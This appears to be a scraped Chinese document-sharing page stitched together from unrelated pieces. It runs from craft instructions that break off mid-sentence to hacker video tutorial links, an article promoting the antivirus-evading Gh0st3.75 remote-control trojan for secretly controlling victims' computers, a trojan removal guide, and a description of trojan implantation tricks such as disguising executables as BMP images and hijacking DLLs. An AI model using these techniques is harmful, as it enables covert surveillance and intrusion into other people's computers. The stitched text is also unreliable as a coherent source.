16个生活中很实用的简单小制作 1、自制羽毛球准备材料：空饮料瓶一只，泡沫水果网套两只，橡皮筋一根，玻璃弹子一只。制作过程：1.取250毫升空饮料瓶一只，将瓶子的上半部分剪下；2.将剪下的部分均分为8份，用剪刀剪至瓶颈处，然后，将每一份剪成大小一致的花瓣形状；3.将泡沫水果网套套在瓶身外，用橡皮筋固定在瓶口处；4.将另一只泡沫水果网套裹住一粒玻璃弹子，塞进瓶口，塞紧并露出1厘米左右；5.剪下半只乒乓球，将半球底面覆在瓶口上，四边剪成须状，盖住瓶口后用橡皮筋固定住。6.美化修饰后，一只自制羽毛球完成了。用羽毛球拍打一打，看看效果怎么样？ 2、自制香皂纸制作材料和工具：吸湿性较好的白纸，小块香皂，一支毛笔和一次性饮料罐。制作方法：先把香皂切碎后放在罐里，盛上适量的水后把杯子放在炉上加热，等香皂融化，将白纸裁成火柴盒大小，一张张涂透皂液，再取出阴干就成了香皂纸。 3、自制热气球1.首先我们用软纸裁出6～8个叶状的纸片。2.将它们对折并用胶水将它们的边粘在一起作成一个气球。3.用胶带将四根连线粘到气球底部。用橡皮泥将线的另外一端固定在桌子上。4.尽量将电吹风的速度调的很慢。将吹风口向上对准底部的开口并且打开开关。气球会慢慢变大拉紧细线并且离开桌面。 4、自制手电筒具体制作方法是：将一只废易拉罐（如露露饮料罐）起掉一头盖子，另一头用圆头榔头敲凹。用厚瓦楞纸板卷起两节一号电池，电池正极朝上、负极朝下装入罐中。找一个合适的塑料盖（如神奇大大卷的盒盖正好可以扣在露露饮料罐上），在盒盖中央挖一个圆形小洞，洞的大小以使灯泡插紧为宜。将灯泡底座插入小洞。取一段寻线两端剥去线皮，一端绕在灯座上，另一端从塑料盖侧面扎一个小孔穿出。将塑料盖盖在易拉罐上。检查一下，灯泡、电池是不是紧密接触。到这里一次性手电筒就做好了。使用时，用大拇指把从侧壁穿出的导线按在从拉罐无油漆的焊缝上，手电筒就会

灰鸽子远程控制木马教程

一定要用迅雷下，不然可能下不了 【黑客视频教程-建立超级隐藏帐户】 https://www.360docs.net/doc/a117393253.html,/eschool/esafe2/hideadmin1.wmv https://www.360docs.net/doc/a117393253.html,/eschool/esafe2/hideadmin2.wmv https://www.360docs.net/doc/a117393253.html,/eschool/esafe2/hideadmin3.wmv 【黑客视频教程-简单制作CHM木马】 https://www.360docs.net/doc/a117393253.html,/eschool/esafe2/CHM1.wmv https://www.360docs.net/doc/a117393253.html,/eschool/esafe2/CHM2.wmv 【黑客视频教程-简单破解Access数据库的密码】 https://www.360docs.net/doc/a117393253.html,/eschool/esafe2/Access.wmv 【黑客视频教程-功能超强的BEAST远控木马】 https://www.360docs.net/doc/a117393253.html,/eschool/esafe2/BEAST1.wmv https://www.360docs.net/doc/a117393253.html,/eschool/esafe2/BEAST2.wmv https://www.360docs.net/doc/a117393253.html,/eschool/esafe2/BEAST3.wmv https://www.360docs.net/doc/a117393253.html,/eschool/esafe2/BEAST4.wmv 【黑客视频教程-VMware虚拟机的安装和使用】 https://www.360docs.net/doc/a117393253.html,/eschool/esafe2/VMware1.wmv https://www.360docs.net/doc/a117393253.html,/eschool/esafe2/VMware2.wmv https://www.360docs.net/doc/a117393253.html,/eschool/esafe2/VMware3.wmv 【黑客视频教程-Iris网络嗅探器使用与技巧】 https://www.360docs.net/doc/a117393253.html,/eschool/esafe2/Iris01.wmv

Gh0st3.75远程控制的原理和使用

Gh0st3.75远程控制的原理和使用 【摘要】Gh0st3.75免杀远控是一款功能十分强大的远程控制的软件，可实现远程电脑控制，键盘记录，文件浏览和音频聊天等功能。本文首先简单介绍了远程控制的原理和用途，之后简单介绍了Gh0st3.75免杀远控的功能和应用，然后通过实例演示了Gh0st3.75免杀远控的配置使用过程，并对该软件做出了总结与评价。 【关键字】Gh0st3.75免杀远控；远程控制原理；远程控制应用 1.远程控制简介 远程控制软件，主要用于pc管理和服务，是在网络上由一台电脑（主控端 /客户端）远距离去控制另一台电脑（被控端 Host/服务器端）的应用软件，使用时客户端程序向被控端电脑中的服务器端程序发出信号，建立一个特殊的远程服务，然后通过这个远程服务，使用各种远程控制功能发送远程控制命令，控制被控端电脑中的各种应用程序运行。具有强大的内网穿透功能。 1.1远程控制的原理 远控软件一般分客户端程序(Client)和服务器端程序(Server)两部分，通常将客户端程序安装到主控端的电脑上，将服务器端程序安装到被控端的电脑上。使用时客户端程序向被控端电脑中的服务器端程序发出信号，建立一个特殊的远程服务，然后通过这个远程服务，使用各种远程控制功能发送远程控制命令，控制被控端电脑中的各种应用程序运行。 用户连接到网络上，通过远程访问的客户端程序发送客户身份验证信息和与远程主机连接的要求，远程主机的服务器端程序验证客户身份，如果验证通过，那么就与客户建立连接，并向用户发送给验证通过和已建立连接的信息。那么这个时候，用户便可以通过客户端程序监控或向远程主机发送要执行的指令，而服务器端程序则执行这些指令，并把键盘、鼠标和屏幕刷新数据传给客户端程序，客户端程序通过运算把主机的屏幕等信息显示给用户看，使得用户可以在远程主机上进行工作。如果没有通过身份验证的话，就是没有与用户建立连接，用户也就不能远程控制远程主机了。 1.2远程控制的应用 远程控制在众多的领域里有着非常广泛的应用，如： a.远程办公 b.远程教育 c.远程维护 d.远程协助 e.远程指挥 2．Gh0st3.75免杀远控的功能和应用 2.1 Gh0st 3.75免杀远控简介 免杀远控是指利用这个软件制造病毒，通过网页，传送等放发送给其他用户，让其他主机被你控制。实现例如：查看对方视频、对方语音、键盘记录、系统应用等功能，并且常用杀毒软件并不能发现被远程控制。 Gh0st3.75免杀远控端采用IOCP模型，数据传输采用zlib压缩方式。稳定快速，上线数量无上限，可同时控制上万台主机。控制端自动检测CPU使用率调整自己的工作线程, 稳定高效。宿主为svchost以系统服务启动,有远程守护线程,上线间隔为两分钟。心跳包机制防止意外掉线，支持HTTP和DNS上线两种方式，恢复SSDT,控制端279K，返朴归真的界面，

手工清除木马的几种方法

系统安全:剿清删不掉的DLL木马 DLL注入木马是目前网络上十分流行的木马形式，它就像是一个寄生虫，木马以DLL文件的形式，寄宿在某个重要的系统进程中，通过宿主来调用DLL文件，实现远程控制的功能。这样的木马嵌入到系统进程中可以穿越防火墙，更让人头疼的是，用杀毒软件进行查杀，杀软即使报警提示发现病毒，但是也无法杀掉木马病毒文件，因为木马DLL文件正被宿主调用而无法删除。下面我们把杀软放到一边，通过专用工具及其手工的方法来清除DLL木马。 一、清除思路 1、通过系统工具及其第三方工具找到木马的宿主进程，然后定位到木马DLL文件。 2、结束被木马注入的进程。 3、删除木马文件。 4、注册表相关项的清除。 二、清除方法 1、普通进程DLL注入木马的清除 有许多DLL木马是注入到“iexplore.exe”和“explorer.exe”这两个进程中的，对于注入这类普通进程的DLL木马是很好清除掉的。 如果DLL文件是注入到“iexplore.exe”进程中，此进程就是IE浏览进程，那么可以关掉所有IE窗口和相关程序，然后直接找到DLL文件进行删除就可以了。如果是注入到“explorer.exe”进程中，那么就略显麻烦一些，因为此进程是用于显示桌面和资源管理器的。当通过任务管理器结束掉“explorer.exe”进程时，桌面无法看到，此时桌面上所有图标消失掉，“我的电脑”、“网上邻居”等所有图标都不见了，也无法打开资源管理器找到木马文件进行删除了。怎么办呢? 这时候可以在任务管理器中点击菜单“文件”→“新任务运行”，打开创建新任务对话框，点击“浏览”挖通过浏览对话框就可以打开DLL文件所在的路径。然后选择“文件类型”为“所有文件”，即可显示并删除DLL了。(图1)

木马常见植入方法大曝光

对于给你下木马的人来说，一般不会改变硬盘的盘符图标，但他会修改Autorun.inf文件的属性，将该文件隐藏起来。然后按F5键刷新，这样，当有人双击这个盘符，程序就运行了。 这一招对于经常双击盘符进入“我的电脑”的人最有效。识别这种伪装植入方式的方法是，双击盘符后木马程序会运行，并且我们不能进入盘符。 4把木马文件转换为图片格式 这是一种相对比较新颖的方式，把EXE转化成为BMP图片来欺骗大家。 原理：BMP文件的文件头有54个字节，包括长宽、位数、文件大小、数据区长度。我们只要在EXE的文件头上加上这54字节，IE就会把它当成BMP文件下载下来。改过的图片是花的，会被人看出破绽，用＜imgscr＝″xxx.bmp″higth＝″0″width＝″0″＞，把这样的标签加到网页里，就看不见图片了，也就无法发现“图片”不对劲。IE 把图片下载到临时目录，我们需要一个JavaScript文件在对方的硬盘里写一个VBS文件，并在注册表添加启动项，利用那个VBS找到BMP，调用debug来还原EXE，最后，运行程序完成木马植入。下一次启动时木马就运行了，无声无息非常隐蔽。 5伪装成应用程序扩展组件 此类属于最难识别的特洛伊木马，也是骗术最高的木马。特洛伊木马编写者用自己编制的特洛伊DLL替换已知的系统DLL，并对所有的函数调用进行过滤。对于正常的调用，使用函数转发器直接转发给被替换的系统DLL，对于一些事先约定好的特殊情况，DLL会执行一些相对应的操作。一个比较简单的方法是启动一个进程，虽然所有的操作都在DLL中完成会更加隐蔽，但是这大大增加了程序编写的难度。实际上这样的木马大多数只是使用DLL进行监听，一旦发现控制端的连接请求就激活自身，起一个绑端口的进程进行正常的木马操作。操作结束后关掉进程，继续进入休眠状况。 举个具体的例子，黑客们将写好的文件（例如DLL、OCX等）挂在一个十分出名的软件中，例如QQ中。当受害者打开QQ时，这个有问题的文件即会同时执行。此种方式相比起用合拼程序有一个更大的好处，那就是不用更改被入侵者的登录文件，以后每当其打开QQ时木马程序就会同步运行，相较一般特洛伊木马可说是“踏雪无痕”。目前，有些木马就是采用的这种内核插入式的嵌入方式，利用远程插入线程技术，嵌入DLL 线程。或者挂接PSAPI，实现木马程序的隐藏，甚至在WindowsNT/2000下，都达到了良好的隐藏效果。这样的木马对一般电脑用户来说简直是一个恶梦。防范它的方法就是小心小心再小心！ 6利用WinRar制作成自释放文件 这是最新的伪装方法，把木马服务端程序和WinRar捆绑在一起，将其制作成自释放文件，这样做了以后是非常难以检查的，即使是用最新的杀毒软件也无法发现！识别的方法是：对着经过WinRar捆绑的木马文件点击鼠标右键，查看“属性”，在弹出的“属性”对话框中，会发现多出两个标签“档案文件”和“注释”，点选“注释”标签，你就会发现木马文件了。